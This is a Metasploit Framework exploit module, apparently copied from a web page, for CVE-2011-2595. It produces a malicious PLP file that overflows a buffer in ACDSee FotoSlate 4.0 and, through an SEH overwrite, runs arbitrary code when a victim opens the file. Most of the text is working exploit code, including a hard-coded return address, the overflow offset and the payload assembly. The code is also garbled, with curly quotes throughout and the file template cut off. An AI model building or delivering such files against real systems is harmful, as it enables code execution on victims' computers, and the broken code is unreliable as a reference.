##
# $Id: acdsee_fotoslate_string.rb 13853 2011-10-10 16:47:33Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => ‘ACDSee FotoSlate PLP File id Parameter Overflow’,
‘Description’ => %q{
This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
a specially crafted id parameter in a String element. When viewing a malicious
PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
buffer and execute arbitrary code. This exploit has been tested on systems such as
Windows XP SP3, Windows Vista, and Windows 7.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘Parvez Anwar’, # Vulnerability discovery
‘juan vazquez’ # Metasploit module
],
‘Version’ => ‘$Revision: 13853 $’,
‘References’ =>
[
[ ‘CVE’, ‘2011-2595’ ],
[ ‘OSVDB’, ‘75425’ ],
[ ‘BID’, ‘49558’ ],
],
‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘process’,
‘DisablePayloadHandler’ => ‘true’
},
‘Payload’ =>
{
#’Space’ => 4000,
‘BadChars’ => “\x00\x22”
},
‘Platform’ => ‘win’,
‘Targets’ =>
[
[
‘ACDSee FotoSlate 4.0 Build 146’,
{
‘Ret’ => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
‘Offset’ => 1812,
‘TotalLength’ => 5000
}
],
],
‘Privileged’ => false,
‘DisclosureDate’ => ‘Sep 12 2011’,
‘DefaultTarget’ => 0))
register_options(
[
OptString.new(‘FILENAME’, [ true, ‘The file name.’, ‘msf.plp’]),
], self.class)
end
def exploit
overflow = rand_text(target[“Offset”])
overflow << generate_seh_record(target.ret)
overflow << payload.encoded
overflow << rand_text_alpha(target["TotalLength"] - overflow.length)
plp =<
TEMPLATE
print_status(“Creating ‘#{datastore[‘FILENAME’]}’ file …”)
file_create(plp)
end
end
=begin
After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. But we need to avoid
using a long buffer in order to avoid the meterpreter possibly being broken.
=end
0 条评论。